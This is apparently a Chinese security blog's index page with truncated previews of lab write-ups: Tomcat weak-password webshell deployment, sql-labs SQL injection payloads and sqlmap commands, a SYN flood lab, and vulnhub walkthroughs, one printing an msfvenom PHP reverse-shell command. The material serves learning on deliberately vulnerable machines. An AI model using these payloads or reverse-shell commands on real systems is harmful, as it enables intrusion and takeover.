Don_Joshua's Blog

Tomcat系列漏洞复现Tomcat7+ 弱口令 && 后台getshell漏洞漏洞说明Tomcat7+权限分为： manager（后台管理） manager-gui 拥有html页面权限 manager-status 拥有查看status的权限 manager-script 拥有text接口的权限，和status权限 manager-jmx 拥有jmx权限，和status权限 host-manager（虚拟主机管理） admin-gui 拥有html页面权限 admin-script 拥有text接口权限 Tomcat支持在后台部署war文件，可以直接将webshell部署到web目录下。其中，欲访问后台，需要对应用户有这些相应权限。 对应的弱口令为tomcat:tomcat 漏洞复现进入/vulhub/tomcat/tomcat8目录，直接开启环境 12cd /vulhub/tomcat/tomcat8docker-compose up -d 进入这个页面，环境就算成功了 1http://your-ip:8080/manager/html 一般在 ...

sql-labs通关笔记(下) 上次漏了第十关，这次补上，另外几乎所有用到的知识点都在上篇了，找到数据库名之后的操作就不再赘述，在上篇都有讲 上篇地址：sql-labs通关笔记（上） Less-10：GET -Blind -Time based -double quotes界面在url中加入?id=1 在url中加入?id=-1 可以基本判断和上一题一样依旧是时间盲注 判断注入点使用各种符号加上 and sleep(3)—+来判断闭合方式，需要保持and前的条件为真 payload 1?id=1" and sleep(3)--+ 结果：判断闭合方式为双引号 爆破数据库名payload 1?id=1" and if(ascii(substring((select database()),1,1))>10,sleep(3),0)--+ 结果：判断出数据库的第一个字符为s，睡眠三秒，后面将使用sqlmap进行演示 payload 1sqlmap -u "http://192.168.199.128/sqli/Less-10/?id=1&qu ...

SYN Flood攻击原理：SYN flood攻击是一种常见的拒绝服务（DoS）攻击，旨在通过耗尽目标系统的资源（内存或连接表），使其无法处理合法的连接请求 首先我们要清楚TCP三次握手的原理，以下是建立TCP连接的过程： SYN：首先客户端向服务器发送一个SYN包，请求建立连接 SYN-ACK：服务器收到SYN包，返回一个SYN-ACK包 ACK：客户端收到SYN-ACK包后返回一个ACK包，完成连接建立 而我们的SYN Flood攻击就是利用了TCP建立连接的这个过程： 向目标主机发送大量伪造源IP的SYN报文 服务器收到SYN报文后，分配资源，开启半开连接，返回SYN-ACK报文，等待ACK报文 由于SYN报文中的源IP是伪造的，所以服务器并不会收到ACK报文，从而使连接一直处于半开（half-open） 服务器需要处理这些半开连接，并消耗资源（内存和连接表），最终导致资源耗尽，无法处理新的连接请求 环境搭建 一台kali攻击机（192.168.199.128） 一台Windows Server 2016 作为靶机（192.168.199.136） 接下来我们来演示 ...

sql-labs通关笔记(上) 联合查询注入Less-1：GET -Error based.Single quotes -string界面 在url中加入?id=1 ?id=-1 判断注入点使用’或\来判断是否存在注入点 payload 1http://127.0.0.1/sqli/Less-1/?id=-1' 报错信息 1near ''-1'' LIMIT 0,1' at line 1 报错信息中，去掉用于标识的两个单引号，报错信息为'-1'' LIMIT 0,1 可以看到我们这一关的sql语句是用单引号闭合的，我们确认一下 payload 1http://127.0.0.1/sqli/Less-1/?id=-1' or 1=1--+ 回显 现在已经可以确定其存在字符型的注入点，使用单引号闭合 判断字段数关于order by 众所周知，order by是用于排序的，而其中有一项就是可以按照查询数据的索引来举行排序 比如： 1select id,title from new ...

『vulnhub系列』HMS?-1下载地址：1https://www.vulnhub.com/entry/hms-1,728/ 信息搜集：使用nmap进行存活主机探测，发现开启了21端口（ftp）和22端口（ssh） 匿名登录ftp看看里面有什么东西，发现什么都没有 12ftp 192.168.199.133#使用anonymous登录，无需输入密码 进行全面扫描，发现开启了7080端口 1nmap 192.168.199.133 -p 1-65535 访问7080端口的服务发现存在一个登录页面 使用dirsearch进行目录扫描 1dirsearch -u "http://192.168.199.133:7080/" 在登录页面查看是否存在sql注入，发现确实存在，一个报错注入一个盲注 1sqlmsqlmap -u http://192.168.199.133:7080/login.php --data="user=admin&email=admin%40123&password=asd&btn_login=&q ...

『vulnhub系列』HACKABLE-II下载地址：1https://www.vulnhub.com/entry/hackable-ii,711/ 信息搜集：使用nmap探测存活主机，发现主机开启了21,22和80端口 访问80端口的web服务，发现apache默认页面 使用dirsearch进行目录爆破，发现files 目录 1dirsearch -u "http://192.168.199.135/" 访问files 页面发现CALL.html 访问CALL.html发现只有一段话 这条路的线索暂时断了，我们使用匿名登录ftp，发现CALL.html 12ftp 192.168.199.135#使用anonymous登录，密码为空 get之后发现就是我们刚刚在files中发现的CALL.html 漏洞利用：此时我们上传反弹shell（使用msfvenom生成） 1234msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.199.129 lport=4444 -o re_shell.ph ...

『vulnhub系列』Hack Me Please-1下载地址：1https://www.vulnhub.com/entry/hack-me-please-1,731/ 信息搜集：使用nmap进行探测存活主机，发现主机开启了80端口和3306端口 1nmap 192.168.0.* 访问80端口的web服务 使用dirsearch扫描目录，但是并没有可以访问的页面 1dirsearch -u "http://192.168.0.132/" 在main.js发现提示，有一个目录/seeddms51x/seeddms-5.1.22/ 访问一下是一个登录页面 现在我们扫描这个目录 1dirsearch -u "http://192.168.0.132/seeddms51x/seeddms-5.1.22/" 访问/install页面 发现install不了 1http://192.168.0.132/seeddms51x/seeddms-5.1.22/install/install.php 说是要在conf目录下创建ENABLE ...

『vulnhub系列』EVILBOX-ONE下载地址：1https://www.vulnhub.com/entry/evilbox-one,736/ 信息搜集：使用nmap探测内网存活主机，发现开启了22 和 80端口 1nmap 192.168.0.* 访问80端口web服务，发现apache默认页面 使用dirsearch进行目录爆破 1dirsearch -u "http://192.168.0.131" 访问/robots.txt发现一句话，H4x0r 可能是用户名或密码 1Hello H4x0r 访问/secret/ 发现是空白，我们来扫描这个目录，发现没有结果 我们可以尝试换个工具和字典 1gobuster dir -u "http://192.168.0.131/secret/" -w /usr/share/wordlists/dirb/big.txt -x .php -u 目标url -w wordlist字典 -x 文件后缀 不知道为什么使用dirb用同样的字典和指定php爆破不出来 1dirsearch ...

『vulnhub系列』Deathnote-1下载地址：1https://www.vulnhub.com/entry/deathnote-1,739/ 信息搜集：使用nmap扫描存活主机，发现主机开启了22端口和80端口 1nmap 192.168.0.* 访问80端口的web服务，发现apache默认页面 使用dirsearch 进行目录扫描 1dirsearch -u "http://192.168.0.130" 访问robot.txt,说提示就在/important.jpg 中 访问/important.jpg 页面，发现没有东西，查看源码，意思是我们需要的用户名在user.txt中，暂时还找不到user.txt 先按下不表 我们访问wordpress页面，发现网页访问有问题 查看源代码，发现其跳转是使用的域名，我们在攻击机上将deathnote.vuln解析到ip地址 这里使用windows访问的网站，所以在windows中修改host(C:\Windows\System32\drivers\etc\hosts)文件,添加一条解析记录 11 ...

『vulnhub系列』BEELZEBUB- 1下载地址：1https://www.vulnhub.com/entry/beelzebub-1,742/ 信息搜集：使用nmap扫描存活主机，发现主机开启了22和80端口 1nmap 192.168.0.* 访问80端口的web服务，发现是apache的默认页面 使用dirsearch扫描目录 1dirsearch -u "http://192.168.0.140/" 发现存在phpmyadmin等页面，访问index.php页面，发现是404 /login也是一样 感觉有猫腻，查看一下源代码，果然发现一行提示 12<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->#我的心被加密了，"beelzebub"不知如何被入侵了，并且被解密了 md5 大概的意思是本来是被加密的，后来被用md5解密了，现在我们使用md5加密一下 1d18e1e22becbd9 ...